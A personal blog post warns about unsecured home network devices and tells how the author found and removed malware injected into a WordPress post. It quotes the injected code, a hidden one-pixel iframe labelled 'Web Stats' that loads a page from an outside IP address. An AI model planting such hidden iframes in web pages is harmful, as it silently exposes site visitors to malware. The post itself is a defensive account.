It seems to be a normal practice for network device manufacturers (like HP and IOmega) to leave the password protection wide open on all sorts of network devices like printers, scanners, security camera systems, network storage devices, and so on.
I suspect this is done to make the devices easier to install and use, increasing their user friendly feel while lowering the cost to support. Sadly the side effect is that hackers can easily connect to these devices and access your saved data. So while your computer may be secure with a password, your network devices may be wide open to hacking.
To protect yourself dive back into the manuals for your home network devices and learn how to activate the security functionality. Be sure to pick a difficult password to break that contains numbers, special characters, and most importantly words not found in any dictionary.
This morning at about 8AM my fellow tiny house blogger, Kent Griswold, let me know that this site was creating a security alert in Safari. The alert said that my site contained Malware. Immediately I started digging and within 20 minutes had figured it out. I’m not sure how it was done but a little tiny bit of code was stuck into one of my posts. Here is the code. Don’t worry it’s disabled but I would not recommend visiting that website.
<!– Web Stats –> <iframe src=http://188.8.131.52/stats.php?id=2 width=1 height=1 frameborder=0></iframe> <!– End Web Stats –>
It was only partly visible in html view, the iframe wouldn’t render so it looked virtually invisible. I changed my password, locked down my comments, and tightened up security. I suspect there may be a security hole in the current version of WordPress, but who knows it could have been some plug-in I was testing too.
I’m going to spend a little time later tonight changing passwords on all my blogs and doing what I can to protect myself. If you run blogs I suggest you try doing some searches for Malware too.
Lucky for me they picked my least busy blog, this one, my personal blog. It would seriously suck if my top blogs popped up warning screens like this one to all my visitors. Fricken hacker bastages!